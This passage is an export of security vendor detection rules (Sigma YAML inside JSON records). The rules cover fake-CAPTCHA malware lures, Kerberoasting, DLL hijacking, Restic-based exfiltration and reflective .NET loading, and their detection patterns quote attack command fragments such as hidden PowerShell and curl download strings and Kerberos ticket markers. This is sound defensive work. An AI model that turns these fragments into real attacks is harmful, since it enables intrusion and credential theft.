"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623523Z",
"creation_date": "2026-03-23T11:45:34.623525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623530Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/004/"
],
"name": "t1204_001_fake_captcha_exploitation.yml",
"content": "title: Fake Captcha Exploitation Detected\nid: a07274ba-e853-4ac9-b887-bc07d56cd242\ndescription: |\n Detects a suspicious command related to fake Captchas.\n Attackers use fake Captcha verification pages to trick users into executing a malicious payload by asking them to open and copy paste malicious code into a terminal.\n This technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\n It is recommended to investigate the command to determine its legitimacy.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2025/01/06\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\mshta.exe'\n ParentImage|endswith: '\\explorer.exe'\n\n selection_cmd1:\n CommandLine|contains|all:\n - 'am'\n # same with \\xce\\x99 for 'I' and \\xce\\xbf for 'o' , resembling unicode characters\n - 'n?t'\n - 'r?b?t'\n\n selection_cmd2:\n CommandLine|contains:\n - 'CAPTCHA'\n - 'Cl?udflare'\n - 'Verification'\n\n selection_cmd3:\n CommandLine|contains: ' && curl.exe --proto-default httP -L -o '\n\n selection_powershell:\n CommandLine|contains|all:\n - 'PowerShell.exe -W Hidden -C'\n - 'New-Object -ComObject'\n - 'Service connection checkup'\n\n condition: selection_image and (all of selection_cmd* or selection_powershell)\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a07274ba-e853-4ac9-b887-bc07d56cd242",
"rule_name": "Fake Captcha Exploitation Detected",
"rule_description": "Detects a suspicious command related to fake Captchas.\nAttackers use fake Captcha verification pages to trick users into executing a malicious payload by asking them to open and copy paste malicious code into a terminal.\nThis technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\nIt is recommended to investigate the command to determine its legitimacy.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2026-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.004",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0999f7b-2f2f-4335-a5e2-f5e5af84382a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085309Z",
"creation_date": "2026-03-23T11:45:34.085311Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085316Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.vaadata.com/blog/what-is-kerberoasting-attack-and-security-tips-explained/",
"https://asiapacificdefencereporter.com/wp-content/uploads/2023/08/Final-CRWD-2023-Threat-Hunting-Report.pdf",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1558_003_kerberoasting_attempt_detected.yml",
"content": "title: Kerberoasting Attempt Detected via PowerShell\nid: a0999f7b-2f2f-4335-a5e2-f5e5af84382a\ndescription: |\n Detects the use of PowerShell to perform Kerberoasting by enumerating user accounts with SPNs and requesting Kerberos TGS tickets.\n The tickets are then extracted and formatted for offline password cracking.\n This behavior is commonly associated with lateral movement or privilege escalation attempts.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell to look for malicious content or actions.\nreferences:\n - https://www.vaadata.com/blog/what-is-kerberoasting-attack-and-security-tips-explained/\n - https://asiapacificdefencereporter.com/wp-content/uploads/2023/08/Final-CRWD-2023-Threat-Hunting-Report.pdf\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2022/07/10\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'DirectoryServices.DirectorySearcher'\n - '[ADSI]'\n - 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken'\n - '^(.*?)04820...(.*)'\n - '$krb5tgs$23$*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0999f7b-2f2f-4335-a5e2-f5e5af84382a",
"rule_name": "Kerberoasting Attempt Detected via PowerShell",
"rule_description": "Detects the use of PowerShell to perform Kerberoasting by enumerating user accounts with SPNs and requesting Kerberos TGS tickets.\nThe tickets are then extracted and formatted for offline password cracking.\nThis behavior is commonly associated with lateral movement or privilege escalation attempts.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell to look for malicious content or actions.\n",
"rule_creation_date": "2022-07-10",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0c5d981-479e-44e7-b5e2-ae6124aa529e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618495Z",
"creation_date": "2026-03-23T11:45:34.618497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_ditto_archive_creation_file.yml",
"content": "title: Archive Created via ditto in a Suspicious Folder\nid: a0c5d981-479e-44e7-b5e2-ae6124aa529e\ndescription: |\n Detects archive creation using ditto in a folder commonly used by malicious code.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to ditto's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/06/13\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.LOLBin.Ditto\n - classification.macOS.Behavior.Collection\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/ditto'\n ProcessCommandLine|contains: ' -c '\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0c5d981-479e-44e7-b5e2-ae6124aa529e",
"rule_name": "Archive Created via ditto in a Suspicious Folder",
"rule_description": "Detects archive creation using ditto in a folder commonly used by malicious code.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to ditto's execution and the content of the archive.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0c89315-2c0d-447a-b0e8-2ea3aac36e0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590062Z",
"creation_date": "2026-03-23T11:45:34.590066Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590073Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msteams.yml",
"content": "title: DLL Hijacking via msteams.exe\nid: a0c89315-2c0d-447a-b0e8-2ea3aac36e0c\ndescription: |\n Detects potential Windows DLL Hijacking via msteams.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msteams.exe'\n ImageLoaded|endswith:\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files (x86)\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0c89315-2c0d-447a-b0e8-2ea3aac36e0c",
"rule_name": "DLL Hijacking via msteams.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msteams.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a129d6b7-a21b-4e9f-95d8-ce1287f25e1f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602268Z",
"creation_date": "2026-03-23T11:45:34.602272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602279Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_printfilterpipelinesvc.yml",
"content": "title: DLL Hijacking via PrintFilterPipelineSvc.exe\nid: a129d6b7-a21b-4e9f-95d8-ce1287f25e1f\ndescription: |\n Detects potential Windows DLL Hijacking via PrintFilterPipelineSvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'PrintFilterPipelineSvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\powrprof.dll'\n - '\\prntvpt.dll'\n - '\\xpsservices.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a129d6b7-a21b-4e9f-95d8-ce1287f25e1f",
"rule_name": "DLL Hijacking via PrintFilterPipelineSvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PrintFilterPipelineSvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a135187d-5339-40eb-a24b-1539ac6df95b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077265Z",
"creation_date": "2026-03-23T11:45:34.077267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077271Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1048_exfiltration_through_restic.yml",
"content": "title: Data Possibly Exfiltrated via Restic Backup Tool\nid: a135187d-5339-40eb-a24b-1539ac6df95b\ndescription: |\n Detects a Restic command-line used to backup data to an external IP address.\n This technique can be used by attackers to exfiltrate data from an infected system quietly by using a legitimate backup tool.\n Restic usage was spotted during a Nitrogen malware campaign used by ALPHV Ransomware affiliates.\n It is recommended to check if this backup is recurrent and legitimate.\nreferences:\n - https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\n - https://attack.mitre.org/techniques/T1048/\ndate: 2023/12/13\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Restic\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_backup:\n Image|endswith:\n - '\\Restic.exe'\n - '\\restic_*.exe'\n CommandLine|contains: 'backup'\n\n selection_remote:\n CommandLine|contains:\n - '-r'\n - '--repo'\n\n selection_protocol:\n CommandLine|contains:\n - 'sftp:'\n - 'rest:'\n - 's3:'\n - 'swift:'\n - 'b2:'\n - 'azure:'\n - 'gs:'\n - 'rclone:'\n\n filter_local_ip:\n CommandLine|contains:\n - '127.' # RFC1122\n - '192.168.' # RFC1918\n - '192.0.0.' # RFC5736\n - '172.16.' # RFC1918\n - '172.17.' # RFC1918\n - '172.18.' # RFC1918\n - '172.19.' # RFC1918\n - '172.2?.' # RFC1918\n - '172.30.' # RFC1918\n - '172.31.' # RFC1918\n - '://10.' # RFC1918, :// avoid matching product versions and such.\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\n# level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a135187d-5339-40eb-a24b-1539ac6df95b",
"rule_name": "Data Possibly Exfiltrated via Restic Backup Tool",
"rule_description": "Detects a Restic command-line used to backup data to an external IP address.\nThis technique can be used by attackers to exfiltrate data from an infected system quietly by using a legitimate backup tool.\nRestic usage was spotted during a Nitrogen malware campaign used by ALPHV Ransomware affiliates.\nIt is recommended to check if this backup is recurrent and legitimate.\n",
"rule_creation_date": "2023-12-13",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a14795b4-3ec8-433a-b68e-66813c847661",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079412Z",
"creation_date": "2026-03-23T11:45:34.079414Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079418Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_reflective_dotnet_assembly_load.yml",
"content": "title: Reflective Dotnet Assembly Loaded by a Windows Process\nid: a14795b4-3ec8-433a-b68e-66813c847661\ndescription: |\n Detects Windows processes loading unmanaged .NET assemblies.\n Attackers commonly use reflective assembly loading to execute malicious .NET code within legitimate processes. This technique enables in-memory execution without writing assemblies to disk, allowing them to bypass application whitelisting, evade file-based detection, and masquerade malicious activities.\n It is recommended to investigate the loading process for unusual behavior, analyze the loaded assembly's functionality and to review process memory for malicious code.\nreferences:\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/11/26\nmodified: 2025/09/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n AssemblyFlags: '0x0'\n AssemblyToken: 'null'\n # Ignore binary not on C drive\n Image|startswith: '?:\\windows\\'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Windows Phone'\n\n filter_path:\n ModuleILPath|contains: '\\'\n\n # Those two processes are managed using correlation rules (load + exec)\n filter_specific_rules:\n ProcessName:\n - 'w3wp.exe'\n - 'sqlservr.exe'\n\n exclusion_system_bin:\n Image:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\system32\\msiexec.exe'\n - '?:\\Windows\\System32\\sdiagnhost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n - '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\current\\emulator\\MmrAgent.NetFxEmulator.exe'\n - '?:\\Windows\\System32\\ClusterUpdateUI.exe'\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\SysWOW64\\TCPSVCS.EXE'\n - '?:\\Windows\\Microsoft.NET\\Framework\\\\*'\n\n exclusion_wmi:\n Image:\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe'\n FullyQualifiedAssemblyName: '????????, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n exclusion_cylance:\n AssemblyName: 'Cylance.DotNetHookHelper'\n\n exclusion_explorer:\n - ProcessImage: '?:\\WINDOWS\\Explorer.EXE'\n ProcessParentImage: '?:\\WINDOWS\\system32\\userinit.exe'\n - ProcessCommandLine: '?:\\WINDOWS\\explorer.exe /factory,{????????-????-????-????-????????????} -Embedding'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_bluetooth:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\ifm electronic\\Maintenance\\Maintenance.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n ProcessGrandparentImage: '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n\n exclusion_defender:\n ProcessCommandLine|contains: 'class Elam{ [DllImport(\"Kernel32\", CharSet=CharSet.Auto, SetLastError=true)] public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);'\n\n exclusion_crowdstrike:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{BD07DDB9-1C61-4DCE-9202-A2BA1757CDB2}'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a14795b4-3ec8-433a-b68e-66813c847661",
"rule_name": "Reflective Dotnet Assembly Loaded by a Windows Process",
"rule_description": "Detects Windows processes loading unmanaged .NET assemblies.\nAttackers commonly use reflective assembly loading to execute malicious .NET code within legitimate processes. This technique enables in-memory execution without writing assemblies to disk, allowing them to bypass application whitelisting, evade file-based detection, and masquerade malicious activities.\nIt is recommended to investigate the loading process for unusual behavior, analyze the loaded assembly's functionality and to review process memory for malicious code.\n",
"rule_creation_date": "2024-11-26",
"rule_modified_date": "2025-09-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a16193ec-65ac-4236-8677-ea8c508bb28b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596542Z",
"creation_date": "2026-03-23T11:45:34.596545Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596553Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_teams.yml",
